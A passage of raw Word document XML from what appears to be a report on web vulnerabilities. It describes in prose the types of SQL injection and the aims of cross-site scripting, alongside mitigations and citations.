          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>t</w:t>
      </w:r>
      <w:r w:rsidR="005230B1" w:rsidRPr="00B54627">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>hen</w:t>
      </w:r>
      <w:r w:rsidR="00CD0642" w:rsidRPr="00B54627">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> be utilised for further exploitation</w:t>
      </w:r>
      <w:r w:rsidR="00633152" w:rsidRPr="00B54627">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00CD0642" w:rsidRPr="00B54627">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> It is recommended to disable database string query error messages after development of the database before the website is deployed live to prevent </w:t>
      </w:r>
      <w:r w:rsidR="004F299E" w:rsidRPr="00B54627">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>this technique</w:t>
      </w:r>
      <w:r w:rsidR="00CD0642" w:rsidRPr="00B54627">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> being utilised for information gathering purposes by malicious actors.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AF69514" w14:textId="24D08D47" w:rsidR="00A80A7B" w:rsidRPr="00B54627" w:rsidRDefault="00A80A7B" w:rsidP="00A80A7B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="252525"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B54627">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="252525"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Inferential SQLi:</w:t>
      </w:r>
      <w:r w:rsidR="00A006B9" w:rsidRPr="00B54627">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="252525"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A006B9" w:rsidRPr="00B54627">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Unlike In-band SQLi techniques</w:t>
      </w:r>
      <w:r w:rsidR="004858EF" w:rsidRPr="00B54627">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00A006B9" w:rsidRPr="00B54627">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> the inferential SQLi category consists of </w:t>
      </w:r>
      <w:r w:rsidR="003213E0" w:rsidRPr="00B54627">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">a </w:t>
      </w:r>
      <w:r w:rsidR="00A006B9" w:rsidRPr="00B54627">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>blind</w:t>
      </w:r>
      <w:r w:rsidR="003213E0" w:rsidRPr="00B54627">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004858EF" w:rsidRPr="00B54627">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>SQL injection whereby the attacker reconstructs the databases parent structure by sending payloads to the backend database that do not return errors but the attacker observes the behaviour of the databases response to blindly enumerate the database. This technique is very complex and slow that is only utilised when in-band error messages have been disabled by the developer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ACC4F3F" w14:textId="5115D925" w:rsidR="002C1131" w:rsidRPr="00B54627" w:rsidRDefault="00CE786E" w:rsidP="00A80A7B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="252525"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B54627">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="252525"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Boolean</w:t>
      </w:r>
      <w:r w:rsidR="00065288" w:rsidRPr="00B54627">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="252525"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">; - </w:t>
      </w:r>
      <w:r w:rsidR="00217832" w:rsidRPr="00B54627">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">This inferential SQLi attack relies on conveying an SQL query to the database which compels the database to return either a true or false (Boolean) statement, depending on the results the content within the HTTP browser will either change or remain the same. The attacker is then able to enumerate the database using multiple payloads to reconstruct the parent structure of the database in order to further exploit </w:t>
      </w:r>
      <w:r w:rsidR="001318E2" w:rsidRPr="00B54627">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>the database to access sensitive information.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EB703E5" w14:textId="77777777" w:rsidR="00A80A7B" w:rsidRPr="00B54627" w:rsidRDefault="00A80A7B" w:rsidP="00A80A7B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="252525"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1DDD8A1D" w14:textId="14710F2F" w:rsidR="00A80A7B" w:rsidRPr="00B54627" w:rsidRDefault="002C1131" w:rsidP="00A80A7B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="252525"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B54627">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="252525"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidR="00CE786E" w:rsidRPr="00B54627">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="252525"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">ime </w:t>
      </w:r>
      <w:r w:rsidRPr="00B54627">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="252525"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>D</w:t>
      </w:r>
      <w:r w:rsidR="00CE786E" w:rsidRPr="00B54627">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="252525"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>elay</w:t>
      </w:r>
      <w:r w:rsidR="00065288" w:rsidRPr="00B54627">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="252525"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">; - </w:t>
      </w:r>
      <w:r w:rsidR="00006F88" w:rsidRPr="00B54627">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">Similar to the Boolean technique but less reliable and even more time consuming, the time delay technique relies on sending an SQL query to the database and waiting on the response time. The longer the response takes the attacker can determine if the query returned a true or false statement, which infers the </w:t>
      </w:r>
      <w:r w:rsidR="002903CC" w:rsidRPr="00B54627">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>database</w:t>
      </w:r>
      <w:r w:rsidR="00006F88" w:rsidRPr="00B54627">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> structure </w:t>
      </w:r>
      <w:r w:rsidR="002903CC" w:rsidRPr="00B54627">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>contains information within the database that the attacker would like to exploit and steal.</w:t>
      </w:r>
      <w:r w:rsidR="00006F88" w:rsidRPr="00B54627">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="252525"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F82A92" w:rsidRPr="00B54627">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>This attack is utilised if the Boolean method has been secured by the developer using strict query input filters.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21D0D42A" w14:textId="77777777" w:rsidR="00B52115" w:rsidRPr="00B54627" w:rsidRDefault="00A80A7B" w:rsidP="00A80A7B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B54627">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="252525"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Out of Band, -</w:t>
      </w:r>
      <w:r w:rsidR="003213E0" w:rsidRPr="00B54627">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="252525"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> DNS or HTTP requests</w:t>
      </w:r>
      <w:r w:rsidR="001318E2" w:rsidRPr="00B54627">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="252525"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>: -</w:t>
      </w:r>
      <w:r w:rsidR="00B52115" w:rsidRPr="00B54627">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="252525"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B52115" w:rsidRPr="00B54627">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>The least common of all the SQLi methods, the out of band technique can only be implemented if a backend database can make independent HTTP or Domain Name System (DNS) request. If a database is able to execute these requests an attacker sends a payload in the form of an SQL query which is then redirected to an attackers webserver where they can retrieve the information requested from the database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37A8F221" w14:textId="77777777" w:rsidR="00B52115" w:rsidRPr="00B54627" w:rsidRDefault="00B52115" w:rsidP="00AD7732">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="252525"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B54627">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>To mitigate this attack, a backend SQL database should be disabled from making DNS and HTTP independent requests which is predominantly disabled by default in most SQL databases because of the high security threat.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19AAB664" w14:textId="4F16C5A4" w:rsidR="002F32F2" w:rsidRPr="00B52115" w:rsidRDefault="002F32F2" w:rsidP="00AD7732">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="252525"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B54627">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">To mitigate against an </w:t>
      </w:r>
      <w:r w:rsidR="001172DC" w:rsidRPr="00B54627">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>SQLi</w:t>
      </w:r>
      <w:r w:rsidRPr="00B54627">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> attack, a database developer must sanitise all data validation rules </w:t>
      </w:r>
      <w:r w:rsidR="00B5508C" w:rsidRPr="00B54627">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>inside</w:t>
      </w:r>
      <w:r w:rsidRPr="00B54627">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> the SQL and PHP</w:t>
      </w:r>
      <w:r w:rsidR="00B5508C" w:rsidRPr="00B54627">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> source</w:t>
      </w:r>
      <w:r w:rsidRPr="00B54627">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> code </w:t>
      </w:r>
      <w:r w:rsidR="00B5508C" w:rsidRPr="00B54627">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>on</w:t>
      </w:r>
      <w:r w:rsidRPr="00B54627">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> a website </w:t>
      </w:r>
      <w:r w:rsidR="00B5508C" w:rsidRPr="00B54627">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">page that users can </w:t>
      </w:r>
      <w:r w:rsidR="009820F1" w:rsidRPr="00B54627">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">utilise to </w:t>
      </w:r>
      <w:r w:rsidR="00B5508C" w:rsidRPr="00B54627">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">interact with the backend database. All source code regarding to the backend database should be </w:t>
      </w:r>
      <w:r w:rsidRPr="00B54627">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>tes</w:t>
      </w:r>
      <w:r w:rsidR="00B5508C" w:rsidRPr="00B54627">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">ted </w:t>
      </w:r>
      <w:r w:rsidRPr="00B54627">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>within a sandbox environment to identify any mistakes within the programming of the database before the website goes live</w:t>
      </w:r>
      <w:r w:rsidR="00010553" w:rsidRPr="00B54627">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> to mitigate SQL database vulnerabilities</w:t>
      </w:r>
      <w:r w:rsidRPr="00B54627">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D066604" w14:textId="0C7636E6" w:rsidR="00B54627" w:rsidRDefault="00AD7732" w:rsidP="00AD7732">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00D6587E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Cross Site Scripting (XSS); - </w:t>
      </w:r>
      <w:r w:rsidR="002C1131">
        <w:t>XSS</w:t>
      </w:r>
      <w:r w:rsidR="00B54627">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B54627">
        <w:fldChar w:fldCharType="begin" w:fldLock="1"/>
      </w:r>
      <w:r w:rsidR="00B54627">
        <w:instrText>ADDIN CSL_CITATION {"citationItems":[{"id":"ITEM-1","itemData":{"abstract":"Cross-Site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(XSS)","id":"ITEM-1","issued":{"date-parts":[["2014"]]},"title":"Cross-site Scripting (XSS) - OWASP","type":"webpage"},"uris":["http://www.mendeley.com/documents/?uuid=d89d6c8b-df0e-460b-b780-32d277c6ecdd"]}],"mendeley":{"formattedCitation":"[94]","plainTextFormattedCitation":"[94]","previouslyFormattedCitation":"[94]"},"properties":{"noteIndex":0},"schema":"https://github.com/citation-style-language/schema/raw/master/csl-citation.json"}</w:instrText>
      </w:r>
      <w:r w:rsidR="00B54627">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00B54627" w:rsidRPr="00B54627">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>[94]</w:t>
      </w:r>
      <w:r w:rsidR="00B54627">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002C1131">
        <w:t>vulnerabilities</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> unlike an </w:t>
      </w:r>
      <w:r w:rsidR="001172DC">
        <w:t>SQLi</w:t>
      </w:r>
      <w:r w:rsidR="002C1131">
        <w:t xml:space="preserve"> exploit</w:t>
      </w:r>
      <w:r w:rsidR="00405516">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">focuses on </w:t>
      </w:r>
      <w:r w:rsidR="00405516">
        <w:t>attacking the front</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> end of a website rather than the backend database</w:t>
      </w:r>
      <w:r w:rsidR="00405516">
        <w:t xml:space="preserve"> with the objective of</w:t>
      </w:r>
      <w:r w:rsidR="00293D05">
        <w:t>;</w:t>
      </w:r>
      <w:r w:rsidR="00B54627">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B859326" w14:textId="344E44EC" w:rsidR="00B54627" w:rsidRDefault="00B54627" w:rsidP="00AD7732">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>1:-</w:t>
      </w:r>
      <w:r w:rsidR="00405516">
        <w:t xml:space="preserve"> stealing user</w:t>
      </w:r>
      <w:r w:rsidR="002C1131">
        <w:t xml:space="preserve"> session</w:t>
      </w:r>
      <w:r w:rsidR="00405516">
        <w:t xml:space="preserve"> cookies to login into a secure area of a website which is known as cookie hijacking when </w:t>
      </w:r>
      <w:r w:rsidR="002C1131">
        <w:t>exploiting the stolen session cookies from a XSS attack</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin" w:fldLock="1"/>
      </w:r>
      <w:r>
        <w:instrText>ADDIN CSL_CITATION {"citationItems":[{"id":"ITEM-1","itemData":{"DOI":"10.3139/9783446441125.006","abstract":"Cross-Site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it.","author":[{"dropping-particle":"","family":"Ziegler","given":"Manuel","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Ziegler","given":"Manuel","non-dropping-particle":"","parse-names":false,"suffix":""}],"container-title":"Web Hacking","id":"ITEM-1","issued":{"date-parts":[["2014"]]},"title":"Cross-Site-Scripting (XSS)","type":"chapter"},"uris":["http://www.mendeley.com/documents/?uuid=c61b4db5-2009-4ce6-ad68-66c881f4c1da"]}],"mendeley":{"formattedCitation":"[95]","plainTextFormattedCitation":"[95]","previouslyFormattedCitation":"[95]"},"properties":{"noteIndex":0},"schema":"https://github.com/citation-style-language/schema/raw/master/csl-citation.json"}</w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="00B54627">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>[95]</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A59E296" w14:textId="1F23E99F" w:rsidR="00B54627" w:rsidRDefault="00B54627" w:rsidP="00AD7732">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>2:-</w:t>
      </w:r>
      <w:r w:rsidR="00405516">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00293D05">
        <w:t xml:space="preserve">creating a </w:t>
      </w:r>
      <w:r w:rsidR="00405516">
        <w:t>redirection attack by embedding a hidden URL within a form</w:t>
      </w:r>
      <w:r w:rsidR="00293D05">
        <w:t xml:space="preserve"> or HTTP </w:t>
      </w:r>
      <w:r w:rsidR="00383FD3">
        <w:t>header</w:t>
      </w:r>
      <w:r w:rsidR="00293D05">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00405516">
        <w:t xml:space="preserve"> that end users are inadvertently redirected to</w:t>
      </w:r>
      <w:r w:rsidR="00293D05">
        <w:t xml:space="preserve"> when a link is clicked</w:t>
      </w:r>
      <w:r w:rsidR="00D811CE">
        <w:t xml:space="preserve"> or</w:t>
      </w:r>
      <w:r w:rsidR="00405516">
        <w:t xml:space="preserve"> where an attacker may have cloned the website to </w:t>
      </w:r>
      <w:r w:rsidR="00293D05">
        <w:t>be able to</w:t>
      </w:r>
      <w:r w:rsidR="00405516">
        <w:t xml:space="preserve"> steal login credentials from users</w:t>
      </w:r>
      <w:r w:rsidR="00293D05">
        <w:t xml:space="preserve"> of the website</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin" w:fldLock="1"/>
      </w:r>
      <w:r>
